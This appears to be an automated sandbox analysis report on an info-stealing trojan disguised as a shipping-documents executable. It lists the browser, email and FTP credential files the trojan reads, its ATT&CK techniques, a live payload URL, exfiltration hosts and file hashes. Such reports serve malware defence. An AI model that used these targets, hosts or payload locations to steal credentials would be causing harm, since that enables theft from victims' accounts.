            Source: C:\Users\user\Desktop\Shipping documents 000293994900.exeProcess created: C:\Users\user\Desktop\Shipping documents 000293994900.exe "C:\Users\user\Desktop\Shipping documents 000293994900.exe"Jump to behavior
            Source: C:\Users\user\Desktop\Shipping documents 000293994900.exeQueries volume information: C:\Users\user\Desktop\Shipping documents 000293994900.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Shipping documents 000293994900.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Shipping documents 000293994900.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Shipping documents 000293994900.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Shipping documents 000293994900.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Shipping documents 000293994900.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Shipping documents 000293994900.exeCode function: 0_2_00405F0A GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW,0_2_00405F0A
            Source: C:\Users\user\Desktop\Shipping documents 000293994900.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

            Stealing of Sensitive Information

            barindex
            Source: Yara matchFile source: 00000004.00000002.3323810255.000000003578C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.3323810255.0000000035761000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: Shipping documents 000293994900.exe PID: 6496, type: MEMORYSTR
            Source: C:\Users\user\Desktop\Shipping documents 000293994900.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\SessionsJump to behavior
            Source: C:\Users\user\Desktop\Shipping documents 000293994900.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Users\user\Desktop\Shipping documents 000293994900.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Source: C:\Users\user\Desktop\Shipping documents 000293994900.exeFile opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.iniJump to behavior
            Source: C:\Users\user\Desktop\Shipping documents 000293994900.exeFile opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.iniJump to behavior
            Source: C:\Users\user\Desktop\Shipping documents 000293994900.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
            Source: C:\Users\user\Desktop\Shipping documents 000293994900.exeFile opened: C:\FTP Navigator\Ftplist.txtJump to behavior
            Source: C:\Users\user\Desktop\Shipping documents 000293994900.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
            Source: C:\Users\user\Desktop\Shipping documents 000293994900.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
            Source: C:\Users\user\Desktop\Shipping documents 000293994900.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
            Source: C:\Users\user\Desktop\Shipping documents 000293994900.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
            Source: C:\Users\user\Desktop\Shipping documents 000293994900.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
            Source: Yara matchFile source: 00000004.00000002.3323810255.0000000035761000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: Shipping documents 000293994900.exe PID: 6496, type: MEMORYSTR

            Remote Access Functionality

            barindex
            Source: Yara matchFile source: 00000004.00000002.3323810255.000000003578C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.3323810255.0000000035761000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: Shipping documents 000293994900.exe PID: 6496, type: MEMORYSTR
            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire InfrastructureValid Accounts121
            Windows Management Instrumentation
            1
            DLL Side-Loading
            11
            Process Injection
            1
            Masquerading
            2
            OS Credential Dumping
            311
            Security Software Discovery
            Remote Services1
            Email Collection
            11
            Encrypted Channel
            Exfiltration Over Other Network Medium1
            System Shutdown/Reboot
            CredentialsDomainsDefault Accounts1
            Native API
            Boot or Logon Initialization Scripts1
            DLL Side-Loading
            1
            Disable or Modify Tools
            1
            Credentials in Registry
            141
            Virtualization/Sandbox Evasion
            Remote Desktop Protocol1
            Archive Collected Data
            1
            Ingress Tool Transfer
            Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)141
            Virtualization/Sandbox Evasion
            Security Account Manager1
            Application Window Discovery
            SMB/Windows Admin Shares2
            Data from Local System
            2
            Non-Application Layer Protocol
            Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
            Process Injection
            NTDS1
            System Network Configuration Discovery
            Distributed Component Object Model1
            Clipboard Data
            13
            Application Layer Protocol
            Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
            Deobfuscate/Decode Files or Information
            LSA Secrets3
            File and Directory Discovery
            SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts2
            Obfuscated Files or Information
            Cached Domain Credentials226
            System Information Discovery
            VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
            DLL Side-Loading
            DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand
            SourceDetectionScannerLabelLink
            Shipping documents 000293994900.exe11%ReversingLabs
            SourceDetectionScannerLabelLink
            C:\Users\user\AppData\Local\Temp\nsvB4E.tmp\System.dll0%ReversingLabs
            No Antivirus matches
            No Antivirus matches
            SourceDetectionScannerLabelLink
            https://api.ipify.org/0%URL Reputationsafe
            https://api.ipify.org0%URL Reputationsafe
            http://nsis.sf.net/NSIS_ErrorError0%URL Reputationsafe
            https://api.ipify.org/t0%URL Reputationsafe
            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
            NameIPActiveMaliciousAntivirus DetectionReputation
            api.ipify.org
            172.67.74.152
            truefalse
              unknown
              concaribe.com
              192.185.13.234
              truetrue
                unknown
                ftp.concaribe.com
                unknown
                unknowntrue
                  unknown
                  NameMaliciousAntivirus DetectionReputation
                  https://api.ipify.org/false
                  • URL Reputation: safe
                  unknown
                  http://84.38.133.42/FZBmQQQpasdj30.binfalse
                    unknown
                    NameSourceMaliciousAntivirus DetectionReputation
                    https://www.wikihow.com/Image:Type-Step-1-Version-6.jpgShipping documents 000293994900.exe, 00000000.00000002.3040528511.0000000002843000.00000004.00000020.00020000.00000000.sdmp, nsj89C.tmp.0.dr, 660.jpg.0.drfalse
                      unknown
                      https://api.ipify.orgShipping documents 000293994900.exe, 00000004.00000002.3323810255.0000000035711000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      http://ftp.concaribe.comShipping documents 000293994900.exe, 00000004.00000002.3323810255.000000003578C000.00000004.00000800.00020000.00000000.sdmpfalse
                        unknown
                        http://nsis.sf.net/NSIS_ErrorErrorShipping documents 000293994900.exefalse
                        • URL Reputation: safe
                        unknown
                        http://concaribe.comShipping documents 000293994900.exe, 00000004.00000002.3323810255.000000003578C000.00000004.00000800.00020000.00000000.sdmpfalse
                          unknown
                          https://api.ipify.org/tShipping documents 000293994900.exe, 00000004.00000002.3323810255.0000000035711000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameShipping documents 000293994900.exe, 00000004.00000002.3323810255.0000000035711000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          • No. of IPs < 25%
                          • 25% < No. of IPs < 50%
                          • 50% < No. of IPs < 75%
                          • 75% < No. of IPs
                          IPDomainCountryFlagASNASN NameMalicious
                          84.38.133.42
                          unknownLatvia
                          203557DATACLUB-NLfalse
                          192.185.13.234
                          concaribe.comUnited States
                          46606UNIFIEDLAYER-AS-1UStrue
                          172.67.74.152
                          api.ipify.orgUnited States
                          13335CLOUDFLARENETUSfalse
                          Joe Sandbox version:41.0.0 Charoite
                          Analysis ID:1546020
                          Start date and time:2024-10-31 11:38:08 +01:00
                          Joe Sandbox product:CloudBasic
                          Overall analysis duration:0h 6m 41s
                          Hypervisor based Inspection enabled:false
                          Report type:full
                          Cookbook file name:default.jbs
                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                          Number of analysed new started processes analysed:6
                          Number of new started drivers analysed:0
                          Number of existing processes analysed:0
                          Number of existing drivers analysed:0
                          Number of injected processes analysed:0
                          Technologies:
                          • HCA enabled
                          • EGA enabled
                          • AMSI enabled
                          Analysis Mode:default
                          Analysis stop reason:Timeout
                          Sample name:Shipping documents 000293994900.exe
                          Detection:MAL
                          Classification:mal100.troj.spyw.evad.winEXE@3/9@2/3
                          EGA Information:
                          • Successful, ratio: 100%
                          HCA Information:
                          • Successful, ratio: 96%
                          • Number of executed functions: 158
                          • Number of non-executed functions: 83
                          Cookbook Comments:
                          • Found application associated with file extension: .exe
                          • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, WmiPrvSE.exe
                          • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, dns.msftncsi.com, fe3cr.delivery.mp.microsoft.com
                          • Report size getting too big, too many NtOpenKeyEx calls found.
                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                          • Report size getting too big, too many NtQueryValueKey calls found.
                          • Report size getting too big, too many NtReadVirtualMemory calls found.
                          • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                          • VT rate limit hit for: Shipping documents 000293994900.exe
                          TimeTypeDescription
                          06:40:51API Interceptor117x Sleep call for process: Shipping documents 000293994900.exe modified
                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                          192.185.13.234draft bl_pdf.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                          • concaribe.com/wp-includes/assets/GkRyQpLAQhPD144.bin
                          172.67.74.15267065b4c84713_Javiles.exeGet hashmaliciousRDPWrap ToolBrowse
                          • api.ipify.org/
                          Yc9hcFC1ux.exeGet hashmaliciousUnknownBrowse
                          • api.ipify.org/
                          4F08j2Rmd9.binGet hashmaliciousXmrigBrowse
                          • api.ipify.org/
                          y8tCHz7CwC.binGet hashmaliciousXmrigBrowse
                          • api.ipify.org/
                          file.exeGet hashmaliciousUnknownBrowse
                          • api.ipify.org/
                          file.exeGet hashmaliciousUnknownBrowse
                          • api.ipify.org/
                          file.exeGet hashmaliciousLummaC, PrivateLoader, Stealc, VidarBrowse
                          • api.ipify.org/
                          file.exeGet hashmaliciousRDPWrap ToolBrowse
                          • api.ipify.org/
                          Prismifyr-Install.exeGet hashmaliciousNode StealerBrowse
                          • api.ipify.org/
                          2zYP8qOYmJ.exeGet hashmaliciousUnknownBrowse
                          • api.ipify.org/
                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                          api.ipify.orgfile.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                          • 104.26.13.205
                          Proforma Invoice.scr.exeGet hashmaliciousAgentTeslaBrowse
                          • 104.26.13.205
                          file.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                          • 104.26.12.205
                          #Uad6c#Ub9e4 #Uc8fc#Ubb38 658749 #Ubc0f 658752..exeGet hashmaliciousAgentTeslaBrowse
                          • 172.67.74.152
                          Quotation.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                          • 172.67.74.152
                          https://www.canva.com/design/DAGVD7_HMvQ/PFkDB3TDx6Ru4nNALhSqqQ/view?utm_content=DAGVD7_HMvQ&utm_campaign=designshare&utm_medium=link&utm_source=editorGet hashmaliciousUnknownBrowse
                          • 104.26.13.205
                          phish_alert_sp2_2.0.0.0.emlGet hashmaliciousHTMLPhisherBrowse
                          • 104.26.12.205
                          https://schiller.life/Get hashmaliciousHTMLPhisherBrowse
                          • 104.26.12.205
                          SecuriteInfo.com.Win32.PWSX-gen.31738.17793.exeGet hashmaliciousAgentTeslaBrowse
                          • 104.26.12.205
                          Biocon-In-Service Agreement.pdfGet hashmaliciousEvilProxy, HTMLPhisherBrowse
                          • 104.26.13.205
                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                          UNIFIEDLAYER-AS-1USHT9324-25 1x40HC LDHFCLDEHAM29656 MRSU5087674.exeGet hashmaliciousFormBookBrowse
                          • 162.241.63.77
                          MP2318GJ-P 18000pcs.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                          • 192.185.118.238
                          Receipt.htmGet hashmaliciousUnknownBrowse
                          • 69.49.245.172
                          SecuriteInfo.com.Win32.SuspectCrc.28663.30359.exeGet hashmaliciousFormBookBrowse
                          • 162.241.63.77
                          http://timecode.com.ar/Webmail/2/Webmail/webmail.php?email=gc@virtualintelligencebriefing.comGet hashmaliciousHTMLPhisherBrowse
                          • 192.185.20.145
                          Shipping documents 00039984849900044800.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                          • 192.185.13.234
                          z1Transaction_ID_REF2418_cmd.batGet hashmaliciousAgentTesla, DBatLoader, PureLog StealerBrowse
                          • 50.116.93.185
                          z1SWIFT_MT103_Payment_552016_cmd.batGet hashmaliciousDBatLoader, FormBookBrowse
                          • 50.116.93.185
                          Order Specifications for Materials.docx.vbsGet hashmaliciousDBatLoader, FormBookBrowse
                          • 50.116.93.185
                          https://mailhotcmhakamloops.wordpress.com/Get hashmaliciousUnknownBrowse
                          • 69.49.230.198
                          DATACLUB-NLQUOTE #46789_AL_JAMEELA24.exeGet hashmaliciousRemcos, GuLoaderBrowse
                          • 84.38.133.160
                          Purchase Order.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                          • 84.38.129.16
                          Documenti di spedizione.bat.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                          • 84.38.129.16
                          PO-94858.exeGet hashmaliciousSnake KeyloggerBrowse
                          • 185.29.11.116
                          PO-94858.exeGet hashmaliciousSnake KeyloggerBrowse
                          • 185.29.11.116
                          Order 10172024.bat.exeGet hashmaliciousAgentTeslaBrowse
                          • 185.29.11.116
                          Order 10172024.bat.exeGet hashmaliciousAgentTeslaBrowse
                          • 185.29.11.116
                          na.htaGet hashmaliciousCobalt Strike, RemcosBrowse
                          • 185.29.11.111
                          Upit 220062.xlsGet hashmaliciousRemcosBrowse
                          • 185.29.11.111
                          1njpP9QcUg.rtfGet hashmaliciousUnknownBrowse
                          • 185.29.11.107
                          CLOUDFLARENETUShttps://www.transfernow.net/dl/20241030KnXGth9fGet hashmaliciousUnknownBrowse
                          • 104.26.15.166
                          file.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                          • 104.26.13.205
                          file.exeGet hashmaliciousLummaCBrowse
                          • 188.114.96.3
                          https://flaviarc.com/vrecord%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20/Get hashmaliciousHTMLPhisherBrowse
                          • 104.18.3.157
                          Eprdtdrqbr.exeGet hashmaliciousSnake KeyloggerBrowse
                          • 188.114.96.3
                          N#U00b0 DE PEDIDO DE ABARROTES DE NOVIEMBRE 2024.exeGet hashmaliciousSnake KeyloggerBrowse
                          • 188.114.96.3
                          HT9324-25 1x40HC LDHFCLDEHAM29656 MRSU5087674.exeGet hashmaliciousFormBookBrowse
                          • 172.67.177.220
                          Proforma Invoice.scr.exeGet hashmaliciousAgentTeslaBrowse
                          • 104.26.13.205
                          24602711 Inv_Or.exeGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
                          • 188.114.96.3
                          http://www.thearchiterra.gr/Get hashmaliciousUnknownBrowse
                          • 104.17.25.14
                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                          3b5074b1b5d032e5620f69f9f700ff0ehttps://alaskan.s3.eu-north-1.amazonaws.com/muna.html?login=abc@everbridge.com&pcnt=3&no_redrct=no_redrct&request_type=cancel_requestGet hashmaliciousUnknownBrowse
                          • 172.67.74.152
                          https://www.transfernow.net/dl/20241030KnXGth9fGet hashmaliciousUnknownBrowse
                          • 172.67.74.152
                          Contrato.exeGet hashmaliciousDarkCloudBrowse
                          • 172.67.74.152
                          Eprdtdrqbr.exeGet hashmaliciousSnake KeyloggerBrowse
                          • 172.67.74.152
                          N#U00b0 DE PEDIDO DE ABARROTES DE NOVIEMBRE 2024.exeGet hashmaliciousSnake KeyloggerBrowse
                          • 172.67.74.152
                          Proforma Invoice.scr.exeGet hashmaliciousAgentTeslaBrowse
                          • 172.67.74.152
                          MP2318GJ-P 18000pcs.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                          • 172.67.74.152
                          Quotation.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                          • 172.67.74.152
                          clipper.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                          • 172.67.74.152
                          Invoices.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                          • 172.67.74.152
                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                          C:\Users\user\AppData\Local\Temp\nsvB4E.tmp\System.dllwhatsappjpg.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                            WEAREX_IHRACAT.exeGet hashmaliciousGuLoaderBrowse
                              WEAREX_IHRACAT.exeGet hashmaliciousGuLoaderBrowse
                                sample.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                  sample.exeGet hashmaliciousGuLoaderBrowse
                                    8737768___19082024.vbsGet hashmaliciousFormBook, GuLoaderBrowse
                                      8737768___19082024.vbsGet hashmaliciousGuLoaderBrowse
                                        Q8QeOUbRK0.exeGet hashmaliciousGuLoaderBrowse
                                          Q8QeOUbRK0.exeGet hashmaliciousGuLoaderBrowse
                                            Thunderstore Mod Manager - Installer.exeGet hashmaliciousUnknownBrowse
                                              Process:C:\Users\user\Desktop\Shipping documents 000293994900.exe
                                              File Type:ASCII text, with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):50
                                              Entropy (8bit):4.558562939644915
                                              Encrypted:false
                                              SSDEEP:3:RlvjDkAQLQIfLBJXmgxv:R1ZQkIP2I
                                              MD5:A6216EF9FBE57B11DEEB1B1FD840C392
                                              SHA1:E554348623EF9ADDDE2FB3F2742D5CC1EF240AB1
                                              SHA-256:EDF6C9DA71DAF3B3DA2E89A1BC6B9F4B812F18FC133CF4706A3AE983E4040946
                                              SHA-512:AF5FDD8419B8384361BBEA7600B4DA7860771DD974D3B2D747C6E1C4F7E4DF49FE4BE5FA2320E9041343C8D2AB5912BE1CF279B61ED2A96954C1C2ED05AA0122
                                              Malicious:false
                                              Reputation:moderate, very likely benign file
                                              Preview:[Common]..Windows=user32::EnumWindows(i r1 ,i 0)..
                                              Process:C:\Users\user\Desktop\Shipping documents 000293994900.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):906191
                                              Entropy (8bit):5.453254135383469
                                              Encrypted:false
                                              SSDEEP:12288:VTrjp39FQn9MHbbZum6sYEtAm3fCeytwiiPGp7HvDgK/:9p39c6Bp6sYa73fCenrGp7PDgQ
                                              MD5:4D0CC15D8888DFB984BF2131EC961D71
                                              SHA1:727EE2CD0FACF40709E8CB0F3AF86B76C6315844
                                              SHA-256:822E3ED09F9F8FA427634360E49D4959DC97F17DC8F84FFF67952A8EA252C996
                                              SHA-512:7F20CF4A55E8EAF2055CEA634297996DE8827B1F4208AD87A7BDAC4981C10B126037F96D7567B0FABF5696807B8A65B97FB953C3DF0582766E1002384A84E919
                                              Malicious:false
                                              Reputation:low
                                              Preview:.B......,................................A.......B..........................o...............................................................................................................................................................................................................G...b...............j...............................................................................................................................S...........D...e...]...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                              Process:C:\Users\user\Desktop\Shipping documents 000293994900.exe
                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                              Category:dropped
                                              Size (bytes):11264
                                              Entropy (8bit):5.813979271513012
                                              Encrypted:false
                                              SSDEEP:192:eF2HS5ih/7i00dWz9T7PH6lOFcQMI5+Vw+bPFomi7dJWsP:rSUmlw9T7DmnI5+N273FP
                                              MD5:7399323923E3946FE9140132AC388132
                                              SHA1:728257D06C452449B1241769B459F091AABCFFC5
                                              SHA-256:5A1C20A3E2E2EB182976977669F2C5D9F3104477E98F74D69D2434E79B92FDC3
                                              SHA-512:D6F28BA761351F374AE007C780BE27758AEA7B9F998E2A88A542EEDE459D18700ADFFE71ABCB52B8A8C00695EFB7CCC280175B5EEB57CA9A645542EDFABB64F1
                                              Malicious:false
                                              Antivirus:
                                              • Antivirus: ReversingLabs, Detection: 0%
                                              Joe Sandbox View:
                                              • Filename: whatsappjpg.exe, Detection: malicious, Browse
                                              • Filename: WEAREX_IHRACAT.exe, Detection: malicious, Browse
                                              • Filename: WEAREX_IHRACAT.exe, Detection: malicious, Browse
                                              • Filename: sample.exe, Detection: malicious, Browse
                                              • Filename: sample.exe, Detection: malicious, Browse
                                              • Filename: 8737768___19082024.vbs, Detection: malicious, Browse
                                              • Filename: 8737768___19082024.vbs, Detection: malicious, Browse
                                              • Filename: Q8QeOUbRK0.exe, Detection: malicious, Browse
                                              • Filename: Q8QeOUbRK0.exe, Detection: malicious, Browse
                                              • Filename: Thunderstore Mod Manager - Installer.exe, Detection: malicious, Browse
                                              Reputation:moderate, very likely benign file
                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1...u.u.u...s.u.a....r.!..q....t....t.Richu.........................PE..L....f.R...........!.................'.......0...............................`.......................................2.......0..P............................P.......................................................0..X............................text............................... ..`.rdata..C....0......."..............@..@.data...x....@.......&..............@....reloc..B....P.......(..............@..B................................................................................................................................................................................................................................................................................................................................................................................
                                              Process:C:\Users\user\Desktop\Shipping documents 000293994900.exe
                                              File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, comment: "File source: https://www.wikihow.com/Image:Type-Step-1-Version-6.jpg", baseline, precision 8, 550x309, components 3
                                              Category:dropped
                                              Size (bytes):32980
                                              Entropy (8bit):7.966258347557809
                                              Encrypted:false
                                              SSDEEP:768:FU6UE3Rk9Eo7uT/59xGBxipyyZ4D9iBao1htGs5AQ:y6UZE3D5v34D9wL1XGnQ
                                              MD5:976F85DF642FE509973BCC05E4A32C2B
                                              SHA1:7A36A94C45039A31FD7A0BAFFCC3ACA8E3AC656A
                                              SHA-256:68B60014573EF5042B6AB616B17BE733AF6E803EA7096036BC3A075790656233
                                              SHA-512:7EA1663835C92E178F3DFBA67BCA0DE52CD5690ED775A67A1A5163E0C4ECF309AA05742B6978206811A2BC95222A823AFE982C1A70D24FACF62A493D4078CDF7
                                              Malicious:false
                                              Reputation:low
                                              Preview:......JFIF.....H.H.....FFile source: https://www.wikihow.com/Image:Type-Step-1-Version-6.jpg...C.....................................%...#... , #&')*)..-0-(0%()(...C...........(...((((((((((((((((((((((((((((((((((((((((((((((((((......5.&...........................................f..........................!1Q.Aa.."q......2RS...#4BTUbru......$%3FVWest..6DEc........&'5CGd......7v.................................3.......................1.!A.Q.2aq."R.3B.....#...r............?...|....@U..P.A@P........(.W..O3R...k(...G....<.,...4..O3B.O3C.ry.A...Q.............(....D.QE.PQ..A5D..T......(.....PM.A5PP...DMA........b...c.K....c.K...E6..q@b.(.P...P..(...`r.Ic..X..Ai.*....0)E.....R..`U..@b.....i..b......Q.(.*w......#}....D....(..@d..4..4.d..<...t.O3B.O3B.O3K.....<.,.<.....FO3P.2y....h..f..<...y....h..f...f...QE;..P...b.....VIb.h...qA!'..RZv..MZ..tj.M.....m..<6..|.jK.>..o.'.J...O.o.'.J...>..H.]J..6....D.....>..H.]*K....k.'.J...>..H.]B..7.zD..ZzF...H.]..#_..O......g.'.JA....T..BzV...J.]Z.J..
                                              Process:C:\Users\user\Desktop\Shipping documents 000293994900.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):380206
                                              Entropy (8bit):2.283052348265357
                                              Encrypted:false
                                              SSDEEP:3072:zZVDR8is0ltz1OWUk+tdYUTn16yd8aXlVDDcwTsKR9A:zZj0COWT+tb6yHXTTsKR9A
                                              MD5:A1DC683D395B4AAD6AADB883922026D6
                                              SHA1:72846E629938F0C24DEB9C8AEAD39A51190E1FF4
                                              SHA-256:80653E80939085343C215D19EB9035353BEB0068AB6EFA11B1BAA4E7D10E1B27
                                              SHA-512:A430DB1C99ACF3A3FFB73754C18A5FF39B0741B9DCBFA6E5A5CD176DF5E90B058C2958336CA98D6194751C087FCB9BA21651EAE594270255BFD5645DC3006144
                                              Malicious:false
                                              Reputation:low
                                              Preview:d..fa........................................=.................-................................A:..:...............q........k.....................D...Y..........................rp......4................2......C......................<)3....................G.......P...z................e.....o...............N........r...................p.......`........m............. .....a...B3.........E.......1.......*...........................i....................s......5.......5.................h..+...................................'.....h....................o...................&.......................|....+.............t.........................@....H.].N.........9.....#.........x....................[...F...................c...............T....................+........9................h.....D....*.....................`.................................JS.......w..................;.........a...m..D.........................................;............................9-...p..............Va........
                                              Process:C:\Users\user\Desktop\Shipping documents 000293994900.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):415829
                                              Entropy (8bit):7.579423942121959
                                              Encrypted:false
                                              SSDEEP:6144:PSVbwty/u9FVKuY9k9Dk6b1hjXtum6gLDPcEtAm3fCTayt7VoTigGIf:P39FQn9MHbbZum6sYEtAm3fCeytwiif
                                              MD5:CFDFBBFE68368C2DB2DACCD1E5542993
                                              SHA1:CD97C7BFD54ABCB5675CCA3049A38DBD0733C04A
                                              SHA-256:4857268BEEE7F2E10237B8570D73DA6775AC19AE5EB5B29739053B76087C1A21
                                              SHA-512:7EE5133835D8B4C5B829216485AD1952C6CFB0A4BEFB6DCD4788C760B6251BE576D2F5646AAADC6B3E49655DFA5A718DACD7E91AB29ED8744AC54D1B7558B3D3
                                              Malicious:false
                                              Reputation:low
                                              Preview:......................................./..............H...................ddd......7....................LL..(...V.................................ffff....>.......H.........iii.[................................TT......DD........^.y........8..(.......5..yy......N............3.......ee...........H...?????............C.......................w.@................^........))).......'..xx....}......99.......x.....o.:::...zzz...|.............z........aa...................j.r.........[.....=........AA..ee..........??.x...............Y.............Q....ee........p.!........((...........................!..................................JJJ..............zz....##.nnnn..B.%....H..................;............<..L...........................%..........uu.>>...................................vvvv............~.................zzzzzzzz...<............88....................uu........H........S..<...................""......X......MMM.9....................t......ww.I..`............w....J.....................
                                              Process:C:\Users\user\Desktop\Shipping documents 000293994900.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):34164
                                              Entropy (8bit):2.280731480965403
                                              Encrypted:false
                                              SSDEEP:384:Hn4soqyBjp3VRJ8c1VeHzeF8mjExy8jaw5zjnyh+:Ys3aPJzeTeMxy8j15J
                                              MD5:091BC262A5D568D2DD2CE1C16934963B
                                              SHA1:58F0086F8C18C516BBBFC86BD9F1B6098E043019
                                              SHA-256:34B4DFD59AE76D70C89C05E2B7D42C5177C14912E5602F3488F14CB2BEC3AE15
                                              SHA-512:019ACBFCFCAF1645A2E365AAC15A15B60EFC1F144CB7C9A703413BAAD79B800037589C80326BE41B487AF8B22F532526301F561EDA67B0F4B7D007A9A4451EF6
                                              Malicious:false
